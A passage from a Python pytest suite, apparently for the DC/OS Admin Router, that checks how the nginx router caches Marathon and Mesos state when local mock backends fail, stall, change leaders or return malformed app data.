with GuardedSubprocess(ar):
# Register Line buffer filter:
lbf = LineBufferFilter(filter_regexp,
timeout=5, # Just to give LBF enough time
line_buffer=ar.stderr_line_buffer)
# Trigger cache update by issuing request:
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
# Break marathon
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='always_bork',
aux_data=True)
# Wait for the cache to be old enough to be discarded by AR:
# cache_max_age_hard_limit + 1s for good measure
# must be more than cache_poll_period
time.sleep(4 + 1)
# Perform the main/test request:
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 503
lbf.scan_log_buffer()
assert lbf.extra_matches == {}
def test_if_temp_marathon_borkage_does_not_disrupt_caching(
self, nginx_class, mocker, valid_user_header):
filter_regexp = {
'Marathon app request failed: invalid response status: 500':
SearchCriteria(1, False),
'Mesos state cache has been successfully updated':
SearchCriteria(2, False),
'Cache entry `svcapps` is stale':
SearchCriteria(1, True),
}
ar = nginx_class(cache_max_age_soft_limit=3,
cache_max_age_hard_limit=1200,
cache_expiration=2,
cache_poll_period=3,
)
url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
with GuardedSubprocess(ar):
# Register Line buffer filter:
lbf = LineBufferFilter(filter_regexp,
timeout=5, # Just to give LBF enough time
line_buffer=ar.stderr_line_buffer)
# Trigger cache update by issuing request:
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
# Break marathon
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='always_bork',
aux_data=True)
# Wait for the cache to be old enough to be considered stale by AR:
# cache_max_age_soft_limit + 1s for a good measure
time.sleep(3 + 1)
# Perform the main/test request:
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
lbf.scan_log_buffer()
assert lbf.extra_matches == {}
def test_if_broken_mesos_causes_mesos_cache_to_expire_and_requests_to_fail(
self, nginx_class, mocker, valid_user_header):
filter_regexp = {
'Mesos state request failed: invalid response status: 500':
SearchCriteria(1, False),
'Marathon apps cache has been successfully updated':
SearchCriteria(2, False),
'Cache entry `mesosstate` is too old, aborting request':
SearchCriteria(1, True),
}
ar = nginx_class(cache_poll_period=3,
cache_expiration=2,
cache_max_age_soft_limit=3,
cache_max_age_hard_limit=4,
)
with GuardedSubprocess(ar):
# Register Line buffer filter:
lbf = LineBufferFilter(filter_regexp,
timeout=5, # Just to give LBF enough time
line_buffer=ar.stderr_line_buffer)
# Trigger cache update using a request:
ping_mesos_agent(ar, valid_user_header)
# Break mesos
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='always_bork',
aux_data=True)
# Wait for the cache to be old enough to be discarded by AR:
# cache_max_age_hard_limit + 1s for good measure
# must be more than cache_poll_period
time.sleep(4 + 1)
# Perform the main/test request:
ping_mesos_agent(ar, valid_user_header, expect_status=503)
lbf.scan_log_buffer()
assert lbf.extra_matches == {}
def test_if_temp_mesos_borkage_does_not_dirupt_caching(
self, nginx_class, mocker, valid_user_header):
filter_regexp = {
'Mesos state request failed: invalid response status: 500':
SearchCriteria(1, False),
'Marathon apps cache has been successfully updated':
SearchCriteria(2, False),
'Cache entry `mesosstate` is stale':
SearchCriteria(1, True),
}
ar = nginx_class(cache_poll_period=3,
cache_expiration=2,
cache_max_age_soft_limit=3,
cache_max_age_hard_limit=1800,
)
with GuardedSubprocess(ar):
# Register Line buffer filter:
lbf = LineBufferFilter(filter_regexp,
timeout=5, # Just to give LBF enough time
line_buffer=ar.stderr_line_buffer)
# Trigger cache update using a request:
ping_mesos_agent(ar, valid_user_header)
# Break mesos
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='always_bork',
aux_data=True)
# Wait for the cache to be old enough to become stale:
# cache_max_age_soft_limit + 1s for good measure
time.sleep(3 + 1)
# Perform the main/test request:
ping_mesos_agent(ar, valid_user_header, expect_status=200)
lbf.scan_log_buffer()
assert lbf.extra_matches == {}
def test_if_broken_marathon_does_not_break_mesos_cache(
self, nginx_class, mocker, valid_user_header):
filter_regexp = {
'Marathon app request failed: invalid response status: 500':
SearchCriteria(1, True),
'Mesos state cache has been successfully updated':
SearchCriteria(1, True),
}
# Break marathon
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='always_bork',
aux_data=True)
ar = nginx_class()
with GuardedSubprocess(ar):
lbf = LineBufferFilter(filter_regexp,
timeout=(CACHE_FIRST_POLL_DELAY + 1),
line_buffer=ar.stderr_line_buffer)
ping_mesos_agent(ar, valid_user_header)
lbf.scan_log_buffer()
assert lbf.extra_matches == {}
def test_if_broken_mesos_does_not_break_marathon_cache(
self, nginx_class, mocker, valid_user_header):
filter_regexp = {
'Mesos state request failed: invalid response status: 500':
SearchCriteria(1, True),
'Marathon apps cache has been successfully updated': SearchCriteria(1, True),
}
# Break marathon
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='always_bork',
aux_data=True)
ar = nginx_class()
url = ar.make_url_from_path('/service/scheduler-alwaysthere/bar/baz')
with GuardedSubprocess(ar):
lbf = LineBufferFilter(filter_regexp,
timeout=(CACHE_FIRST_POLL_DELAY + 1),
line_buffer=ar.stderr_line_buffer)
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
lbf.scan_log_buffer()
assert resp.status_code == 200
req_data = resp.json()
assert req_data['endpoint_id'] == 'http://127.0.0.1:16000'
assert lbf.extra_matches == {}
def test_if_changing_marathon_apps_is_reflected_in_cache(
self, nginx_class, valid_user_header, mocker):
cache_poll_period = 4
ar = nginx_class(cache_poll_period=cache_poll_period, cache_expiration=3)
url = ar.make_url_from_path('/service/scheduler-alwaysthere/bar/baz')
with GuardedSubprocess(ar):
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['endpoint_id'] == 'http://127.0.0.1:16000'
new_apps = {"apps": [SCHEDULER_APP_ALWAYSTHERE_DIFFERENTPORT, ]}
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='set_apps_response',
aux_data=new_apps)
# First poll (2s) + normal poll interval(4s) < 2 * normal poll
# interval(4s)
time.sleep(cache_poll_period * 2)
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['endpoint_id'] == 'http://127.0.0.15:16001'
def test_if_changing_mesos_state_is_reflected_in_cache(
self, nginx_class, valid_user_header, mocker):
cache_poll_period = 4
ar = nginx_class(cache_poll_period=cache_poll_period, cache_expiration=3)
with GuardedSubprocess(ar):
ping_mesos_agent(ar,
valid_user_header,
agent_id=EXTRA_AGENT_DICT['id'],
expect_status=404)
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='enable_extra_agent')
# First poll (2s) + normal poll interval(4s) < 2 * normal poll
# interval(4s)
time.sleep(cache_poll_period * 2)
ping_mesos_agent(ar,
valid_user_header,
agent_id=EXTRA_AGENT_DICT['id'],
endpoint_id='http://127.0.0.4:15003')
def test_if_changing_marathon_leader_is_reflected_in_cache(
self, nginx_class, mocker, valid_user_header):
cache_poll_period = 4
ar = nginx_class(cache_poll_period=cache_poll_period, cache_expiration=3)
url = ar.make_url_from_path('/system/v1/leader/marathon/foo/bar/baz')
with GuardedSubprocess(ar):
# let's make sure that current leader is the default one
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['endpoint_id'] == 'http://127.0.0.2:80'
# change the leader and wait for cache to notice
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='change_leader',
aux_data="127.0.0.3:80")
# First poll (2s) + normal poll interval(4s) < 2 * normal poll
# interval(4s)
time.sleep(cache_poll_period * 2)
# now, let's see if the leader changed
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['endpoint_id'] == 'http://127.0.0.3:80'
def test_if_absence_of_marathon_leader_is_handled_by_cache(
self, nginx_class, mocker, valid_user_header):
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='remove_leader')
ar = nginx_class()
url = ar.make_url_from_path('/system/v1/leader/marathon/foo/bar/baz')
with GuardedSubprocess(ar):
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 503
def test_if_absence_of_agent_is_handled_by_cache(
self, nginx_class, mocker, valid_user_header):
ar = nginx_class()
with GuardedSubprocess(ar):
ping_mesos_agent(
ar,
valid_user_header,
agent_id='bdcd424a-b59e-4df4-b492-b54e38926bd8-S0',
expect_status=404)
def test_if_caching_works_for_mesos_state(
self, nginx_class, mocker, valid_user_header):
# Enable recording for mesos
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='record_requests')
ar = nginx_class()
with GuardedSubprocess(ar):
# Let the cache warm-up:
time.sleep(CACHE_FIRST_POLL_DELAY + 1)
for _ in range(3):
ping_mesos_agent(ar, valid_user_header)
mesos_requests = mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='get_recorded_requests')
# 3 requests + only one upstream request == cache works
assert len(mesos_requests) == 1
def test_if_caching_works_for_marathon_apps(
self, nginx_class, mocker, valid_user_header):
# Enable recording for marathon
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='record_requests')
# Enable recording for mesos
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='record_requests')
ar = nginx_class()
url = ar.make_url_from_path('/service/scheduler-alwaysthere/bar/baz')
with GuardedSubprocess(ar):
# Let the cache warm-up:
time.sleep(CACHE_FIRST_POLL_DELAY + 1)
for _ in range(5):
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
mesos_requests = mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='get_recorded_requests')
marathon_requests = mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='get_recorded_requests')
# 3 requests + only one upstream requst == cache works
assert len(mesos_requests) == 1
assert len(marathon_requests) == 2
def test_if_caching_works_for_marathon_leader(
self, nginx_class, mocker, valid_user_header):
# Enable recording for marathon
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='record_requests')
ar = nginx_class()
url = ar.make_url_from_path('/system/v1/leader/marathon/foo/bar/baz')
with GuardedSubprocess(ar):
# Let the cache warm-up:
time.sleep(CACHE_FIRST_POLL_DELAY + 1)
for _ in range(5):
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['endpoint_id'] == 'http://127.0.0.2:80'
marathon_requests = mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='get_recorded_requests')
# 3 requests + only one upstream request == cache works
assert len(marathon_requests) == 2
def test_if_broken_response_from_marathon_is_handled(
self, nginx_class, mocker, valid_user_header):
filter_regexp = {
'Cannot decode marathon leader JSON': SearchCriteria(1, True),
}
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='break_leader_reply')
ar = nginx_class()
url = ar.make_url_from_path('/system/v1/leader/marathon/foo/bar/baz')
with GuardedSubprocess(ar):
lbf = LineBufferFilter(filter_regexp,
timeout=(CACHE_FIRST_POLL_DELAY + 1),
line_buffer=ar.stderr_line_buffer)
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
lbf.scan_log_buffer()
assert resp.status_code == 503
assert lbf.extra_matches == {}
def test_if_failed_request_triggered_update_is_recovered_by_timers(
self, nginx_class, valid_user_header, mocker, log_catcher):
# The idea here is to make Backend a bit slow, so that AR is still able
# to update cache on first request.
first_poll_delay = 3
poll_period = 3
cache_expiration = 2
# Take cache invalidation out of the picture
ar = nginx_class(cache_first_poll_delay=first_poll_delay,
cache_poll_period=poll_period,
cache_expiration=cache_expiration,
cache_max_age_soft_limit=1200,
cache_max_age_hard_limit=1800,
)
# Make mesos just a bit :)
# It mus respond slower than backend_request_timeout
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='always_bork',
aux_data=True)
with GuardedSubprocess(ar):
start = time.time()
# Let's break the cache by making it update against broken Mesos:
ping_mesos_agent(ar, valid_user_header, expect_status=503)
time.sleep(1)
# Let's make sure that the brokerage is still there
ping_mesos_agent(ar, valid_user_header, expect_status=503)
# Healing hands!
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='always_bork',
aux_data=False)
# Let' wait for first poll to refresh cache
time.sleep(1 + (first_poll_delay - (time.time() - start)))
# Verify that the cache is OK now
ping_mesos_agent(ar, valid_user_header)
def test_if_early_boot_stage_can_recover_from_a_bit_slow_backend(
self, nginx_class, valid_user_header, mocker, log_catcher):
# The idea here is to make Backend a bit slow, so that AR is still able
# to update cache on first request.
refresh_lock_timeout = 10
backend_request_timeout = 5
ar = nginx_class(cache_first_poll_delay=1,
cache_poll_period=3,
cache_expiration=2,
cache_max_age_soft_limit=1200,
cache_max_age_hard_limit=1800,
cache_backend_request_timeout=backend_request_timeout,
cache_refresh_lock_timeout=refresh_lock_timeout,
)
agent_id = AGENT1_ID
url = ar.make_url_from_path('/agent/{}/blah/blah'.format(agent_id))
v = Vegeta(log_catcher, target=url, jwt=valid_user_header, rate=3)
# Make mesos just a bit :)
# It mus respond slower than backend_request_timeout
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='always_stall',
aux_data=backend_request_timeout * 0.3)
with GuardedSubprocess(ar):
with GuardedSubprocess(v):
time.sleep(backend_request_timeout * 0.3 + 1) # let it warm-up!
ping_mesos_agent(ar, valid_user_header)
def test_if_temp_dns_borkage_does_not_disrupt_mesosleader_caching(
self, nginx_class, dns_server_mock, valid_user_header):
filter_regexp_pre = {
'marathon leader cache has been successfully updated':
SearchCriteria(1, True),
'Marathon apps cache has been successfully updated':
SearchCriteria(1, True),
'Mesos state cache has been successfully updated':
SearchCriteria(1, True),
'mesos leader cache has been successfully updated':
SearchCriteria(1, True),
}
filter_regexp_post = {
'marathon leader cache has been successfully updated':
SearchCriteria(1, True),
'Marathon apps cache has been successfully updated':
SearchCriteria(1, True),
'Mesos state cache has been successfully updated':
SearchCriteria(1, True),
# The problem here is that there may occur two updated, one after
# another, and failed one will be retried. This stems directly from
# how cache.lua works. Let's permit multiple occurences for now.
'DNS server returned error code':
SearchCriteria(1, False),
'Cache entry `mesos_leader` is stale':
SearchCriteria(1, True),
}
cache_max_age_soft_limit = 3
ar = nginx_class(cache_max_age_soft_limit=cache_max_age_soft_limit,
cache_max_age_hard_limit=1200,
cache_expiration=2,
cache_poll_period=3,
cache_first_poll_delay=1,
)
url = ar.make_url_from_path('/dcos-history-service/foo/bar')
with GuardedSubprocess(ar):
lbf = LineBufferFilter(filter_regexp_pre,
timeout=5, # Just to give LBF enough time
line_buffer=ar.stderr_line_buffer)
with lbf:
# Trigger cache update by issuing request:
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
assert lbf.extra_matches == {}
lbf = LineBufferFilter(filter_regexp_post,
timeout=5, # Just to give LBF enough time
line_buffer=ar.stderr_line_buffer)
with lbf:
# Break `leader.mesos` DNS entry
dns_server_mock.remove_dns_entry('leader.mesos.')
# Wait for the cache to be old enough to be considered stale by
# AR:
# cache_max_age_soft_limit + extra delay in order to avoid
# race conditions
delay = 2
time.sleep(cache_max_age_soft_limit + delay)
# Perform the main/test request:
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
assert lbf.extra_matches == {}
# This test can succed 40-50% number of times if we remove the fix. Hence
# we re-run it here 5 times.
@pytest.mark.parametrize('execution_number', range(5))
def test_if_mesos_leader_failover_is_followed_by_cache_http(
self,
nginx_class,
valid_user_header,
mocker,
dns_server_mock,
execution_number):
# Nginx resolver enforces 5s (grep for `resolver ... valid=Xs`), so it
# is VERY important to use cache pool period of >5s.
cache_poll_period = 6
ar = nginx_class(
cache_poll_period=cache_poll_period,
cache_expiration=cache_poll_period - 1,
upstream_mesos="http://leader.mesos:5050",
)
# Enable recording for Mesos mocks:
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='record_requests')
mocker.send_command(endpoint_id='http://127.0.0.3:5050',
func_name='record_requests')
dns_server_mock.set_dns_entry('leader.mesos.', ip="127.0.0.2", ttl=2)
with GuardedSubprocess(ar):
# Force cache refresh early, so that we do not have to wait too
# long
ping_mesos_agent(ar,
valid_user_header,
agent_id=EXTRA_AGENT_DICT['id'],
expect_status=404)
dns_server_mock.set_dns_entry('leader.mesos.', ip="127.0.0.3", ttl=2)
# First poll (2s) + normal poll interval(4s) < 2 * normal poll
# interval(4s)
time.sleep(cache_poll_period * 2)
mesosmock_pre_reqs = mocker.send_command(
endpoint_id='http://127.0.0.2:5050',
func_name='get_recorded_requests')
mesosmock_post_reqs = mocker.send_command(
endpoint_id='http://127.0.0.3:5050',
func_name='get_recorded_requests')
assert len(mesosmock_pre_reqs) == 1
assert len(mesosmock_post_reqs) == 1
class TestCacheMesosLeader:
def test_if_unset_hostip_var_is_handled(self, nginx_class, valid_user_header):
filter_regexp = {
'Private IP address of the host is unknown, ' +
'aborting cache-entry creation for mesos leader':
SearchCriteria(1, True),
'mesos leader cache has been successfully updated':
SearchCriteria(1, True),
}
ar = nginx_class(host_ip=None)
with GuardedSubprocess(ar):
lbf = LineBufferFilter(filter_regexp,
line_buffer=ar.stderr_line_buffer)
# Just trigger the cache update:
ping_mesos_agent(ar, valid_user_header)
lbf.scan_log_buffer()
assert lbf.extra_matches == {}
def test_if_missing_mesos_leader_entry_is_handled(
self, nginx_class, valid_user_header, dns_server_mock):
filter_regexp = {
'Failed to instantiate the resolver': SearchCriteria(0, True),
'DNS server returned error code': SearchCriteria(1, True),
'mesos leader cache has been successfully updated':
SearchCriteria(0, True),
}
ar = nginx_class()
with GuardedSubprocess(ar):
lbf = LineBufferFilter(filter_regexp,
line_buffer=ar.stderr_line_buffer)
# Unfortunatelly there are upstreams that use `leader.mesos` and
# removing this entry too early will result in Nginx failing to start.
# So we need to do it right after nginx starts, but before first
# cache update.
time.sleep(1)
dns_server_mock.remove_dns_entry('leader.mesos.')
# Now let's trigger the cache update:
ping_mesos_agent(ar, valid_user_header)
lbf.scan_log_buffer()
assert lbf.extra_matches == {}
def test_if_mesos_leader_locality_is_resolved(
self, nginx_class, valid_user_header, dns_server_mock):
cache_poll_period = 4
nonlocal_leader_ip = "127.0.0.3"
local_leader_ip = "127.0.0.2"
filter_regexp_pre = {
'Failed to instantiate the resolver': SearchCriteria(0, True),
'mesos leader is non-local: `{}`'.format(nonlocal_leader_ip):
SearchCriteria(1, True),
'Private IP address of the host is unknown, ' +
'aborting cache-entry creation for mesos leader':
SearchCriteria(0, True),
'mesos leader cache has been successfully updated':
SearchCriteria(1, True),
}
filter_regexp_post = {
'Failed to instantiate the resolver': SearchCriteria(0, True),
'mesos leader is local': SearchCriteria(1, True),
'Private IP address of the host is unknown, ' +
'aborting cache-entry creation for mesos leader':
SearchCriteria(0, True),
'mesos leader cache has been successfully updated':
SearchCriteria(1, True),
}
dns_server_mock.set_dns_entry('leader.mesos.', ip=nonlocal_leader_ip)
ar = nginx_class(cache_poll_period=cache_poll_period, cache_expiration=3)
with GuardedSubprocess(ar):
lbf = LineBufferFilter(filter_regexp_pre,
line_buffer=ar.stderr_line_buffer)
# Just trigger the cache update:
ping_mesos_agent(ar, valid_user_header)
lbf.scan_log_buffer()
assert lbf.extra_matches == {}
dns_server_mock.set_dns_entry('leader.mesos.', ip=local_leader_ip)
# First poll (2s) + normal poll interval(4s) < 2 * normal poll
# interval(4s)
time.sleep(cache_poll_period * 2)
lbf = LineBufferFilter(filter_regexp_post,
line_buffer=ar.stderr_line_buffer)
# Just trigger the cache update:
ping_mesos_agent(ar, valid_user_header)
lbf.scan_log_buffer()
assert lbf.extra_matches == {}
def test_if_backend_requests_have_useragent_set_correctly(
self, nginx_class, mocker, valid_user_header):
# Enable recording for marathon
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='record_requests')
# Enable recording for Mesos
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='record_requests')
# Make regular polling occur later than usual, so that we get a single
# cache refresh:
ar = nginx_class(cache_poll_period=60, cache_expiration=55)
with GuardedSubprocess(ar):
# Initiate cache refresh by issuing a request:
ping_mesos_agent(ar, valid_user_header)
mesos_requests = mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='get_recorded_requests')
marathon_requests = mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='get_recorded_requests')
assert len(mesos_requests) == 1
assert len(marathon_requests) == 2
# We could use a loop here, but let's make it a bit easier to debug:
verify_header(mesos_requests[0]['headers'],
'User-Agent',
'Master Admin Router')
verify_header(marathon_requests[0]['headers'],
'User-Agent',
'Master Admin Router')
verify_header(marathon_requests[1]['headers'],
'User-Agent',
'Master Admin Router')
class TestCacheMarathon:
def test_ip_per_task_app_with_user_networking_and_portmappings(
self, nginx_class, mocker, valid_user_header):
app = self._scheduler_alwaysthere_app()
app['ipAddress'] = {'networkName': 'samplenet'}
app['tasks'][0]['ipAddresses'][0]['ipAddress'] = '127.0.0.2'
app['container']['docker']['network'] = "USER"
app['container']['docker']['portMappings'][0]['containerPort'] = '80'
ar = nginx_class()
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='set_apps_response',
aux_data={"apps": [app]})
url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
with GuardedSubprocess(ar):
# Trigger cache update by issuing request:
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['endpoint_id'] == 'http://127.0.0.2:80'
def test_ip_per_task_app_with_user_networking_and_portdefinitions(
self, nginx_class, mocker, valid_user_header):
app = self._scheduler_alwaysthere_app()
app['ipAddress'] = {'networkName': 'samplenet'}
app['tasks'][0]['ipAddresses'][0]['ipAddress'] = '127.0.0.2'
app['container']['docker']['network'] = "USER"
app['portDefinitions'] = [
{
"port": 80,
"protocol": "tcp",
"labels": {}
},
]
ar = nginx_class()
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='set_apps_response',
aux_data={"apps": [app]})
url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
with GuardedSubprocess(ar):
# Trigger cache update by issuing request:
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['endpoint_id'] == 'http://127.0.0.2:80'
def test_ip_per_task_app_without_user_networking(
self, nginx_class, mocker, valid_user_header):
app = self._scheduler_alwaysthere_app()
app['ipAddress'] = {
'networkName': 'samplenet',
'discovery': {
"ports": [
{"number": 80, "name": "http", "protocol": "tcp"}
]
}
}
app['tasks'][0]['ipAddresses'][0]['ipAddress'] = '127.0.0.2'
ar = nginx_class()
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='set_apps_response',
aux_data={"apps": [app]})
url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
with GuardedSubprocess(ar):
# Trigger cache update by issuing request:
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['endpoint_id'] == 'http://127.0.0.2:80'
def test_ip_per_task_app_with_unspecified_ip_address_DCOS_OSS_1366(
self, nginx_class, mocker, valid_user_header):
"""
Test that an app that, instead of specifying 'ipAddress: null' does not
specify 'ipAddress' at all, is successfully cached.
"""
app = self._scheduler_alwaysthere_app()
# Remove the 'ipAddress' key completely, thereby triggering DCOS_OSS-1366.
del(app["ipAddress"])
ar = nginx_class()
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='set_apps_response',
aux_data={"apps": [app]})
url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
with GuardedSubprocess(ar):
# Trigger cache update by issuing request:
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['endpoint_id'] == 'http://127.0.0.1:16000'
def test_upstream_wrong_json(
self, nginx_class, mocker, valid_user_header):
filter_regexp = {
"Cannot decode Marathon apps JSON: ": SearchCriteria(1, True),
}
ar = nginx_class()
# Set wrong non-json response content
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='set_encoded_response',
aux_data=b"wrong response")
url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
with GuardedSubprocess(ar):
# Register Line buffer filter:
lbf = LineBufferFilter(filter_regexp,
timeout=5, # Just to give LBF enough time
line_buffer=ar.stderr_line_buffer)
# Trigger cache update by issuing request:
resp = requests.get(url,
allow_redirects=False,
headers=valid_user_header)
expected = "503 Service Unavailable: invalid Marathon svcapps cache"
assert expected == resp.content.decode('utf-8').strip()
assert resp.status_code == 503
lbf.scan_log_buffer()
assert lbf.extra_matches == {}
def test_app_without_labels(
self, nginx_class, mocker, valid_user_header):
app = self._scheduler_alwaysthere_app()
app.pop("labels", None)
filter_regexp = {
"Labels not found in app '{}'".format(app["id"]): SearchCriteria(1, True),
}
self._assert_filter_regexp_for_invalid_app(
filter_regexp, app, nginx_class, mocker, valid_user_header)
def test_app_without_service_scheme_label(
self, nginx_class, mocker, valid_user_header):
app = self._scheduler_alwaysthere_app()
app["labels"].pop("DCOS_SERVICE_SCHEME", None)
filter_regexp = {
"Cannot find DCOS_SERVICE_SCHEME for app '{}'".format(app["id"]):
SearchCriteria(1, True),
}
self._assert_filter_regexp_for_invalid_app(
filter_regexp, app, nginx_class, mocker, valid_user_header)
def test_app_without_port_index_label(
self, nginx_class, mocker, valid_user_header):
app = self._scheduler_alwaysthere_app()
app["labels"].pop("DCOS_SERVICE_PORT_INDEX", None)
filter_regexp = {
"Cannot find DCOS_SERVICE_PORT_INDEX for app '{}'".format(app["id"]):
SearchCriteria(1, True),
}
self._assert_filter_regexp_for_invalid_app(
filter_regexp, app, nginx_class, mocker, valid_user_header)
def test_app_with_port_index_nan_label(
self, nginx_class, mocker, valid_user_header):
app = self._scheduler_alwaysthere_app()
app["labels"]["DCOS_SERVICE_PORT_INDEX"] = "not a number"
filter_regexp = {
"Cannot convert port to number for app '{}'".format(app["id"]):
SearchCriteria(1, True),
}
self._assert_filter_regexp_for_invalid_app(
filter_regexp, app, nginx_class, mocker, valid_user_header)
def test_app_without_mesos_tasks(
self, nginx_class, mocker, valid_user_header):
app = self._scheduler_alwaysthere_app()
app["tasks"] = []
filter_regexp = {
"No task in state TASK_RUNNING for app '{}'".format(app["id"]):
SearchCriteria(1, True),
}
self._assert_filter_regexp_for_invalid_app(
filter_regexp, app, nginx_class, mocker, valid_user_header)
def test_app_without_tasks_in_running_state(
self, nginx_class, mocker, valid_user_header):
app = self._scheduler_alwaysthere_app()
app["tasks"] = [{"state": "TASK_FAILED"}]
filter_regexp = {
"No task in state TASK_RUNNING for app '{}'".format(app["id"]):
SearchCriteria(1, True),
}
self._assert_filter_regexp_for_invalid_app(
filter_regexp, app, nginx_class, mocker, valid_user_header)
def test_app_without_task_host(
self, nginx_class, mocker, valid_user_header):
app = self._scheduler_alwaysthere_app()
app["tasks"][0].pop("host", None)
filter_regexp = {
"Cannot find host or ip for app '{}'".format(app["id"]):
SearchCriteria(1, True),
}
self._assert_filter_regexp_for_invalid_app(
filter_regexp, app, nginx_class, mocker, valid_user_header)
def test_app_without_task_ports(
self, nginx_class, mocker, valid_user_header):
app = self._scheduler_alwaysthere_app()
app["tasks"][0].pop("ports", None)
filter_regexp = {
"Cannot find ports for app '{}'".format(app["id"]):
SearchCriteria(1, True),
}
self._assert_filter_regexp_for_invalid_app(
filter_regexp, app, nginx_class, mocker, valid_user_header)
def test_app_without_task_specified_port_idx(
self, nginx_class, mocker, valid_user_header):
app = self._scheduler_alwaysthere_app()
app["labels"]["DCOS_SERVICE_PORT_INDEX"] = "5"
filter_regexp = {
"Cannot find port at Marathon port index '5' for app '{}'".format(
app["id"]): SearchCriteria(1, True),
}
self._assert_filter_regexp_for_invalid_app(
filter_regexp, app, nginx_class, mocker, valid_user_header)
def _assert_filter_regexp_for_invalid_app(
self,
filter_regexp,
app,
nginx_class,
mocker,
auth_headers,
):
"""Helper method that will assert if provided regexp filter is found
in nginx logs for given apps response from Marathon upstream endpoint.
Arguments:
filter_regexp (dict): Filter definition where key is the message
looked up in logs and value is SearchCriteria definition
app (dict): App that upstream endpoint should respond with
nginx_class (Nginx): Nginx process fixture
mocker (Mocker): Mocker fixture
auth_header (dict): Headers that should be passed to Nginx in the
request
"""
ar = nginx_class()
mocker.send_command(endpoint_id='http://127.0.0.1:8080',
func_name='set_apps_response',
aux_data={"apps": [app]})
# Remove all entries for mesos frameworks and mesos_dns so that
# we test only the information in Marathon
mocker.send_command(endpoint_id='http://127.0.0.2:5050',
func_name='set_frameworks_response',
aux_data=[])
mocker.send_command(endpoint_id='http://127.0.0.1:8123',
func_name='set_srv_response',
aux_data=[])
url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
with GuardedSubprocess(ar):
# Register Line buffer filter:
lbf = LineBufferFilter(filter_regexp,
timeout=5, # Just to give LBF enough time
line_buffer=ar.stderr_line_buffer)
# Trigger cache update by issuing request:
resp = requests.get(url,
allow_redirects=False,
headers=auth_headers)
assert resp.status_code == 404
lbf.scan_log_buffer()
assert lbf.extra_matches == {}
def _scheduler_alwaysthere_app(self):
"""Returns a valid Marathon app with the '/scheduler-alwaysthere' id"""
return copy.deepcopy(SCHEDULER_APP_ALWAYSTHERE)
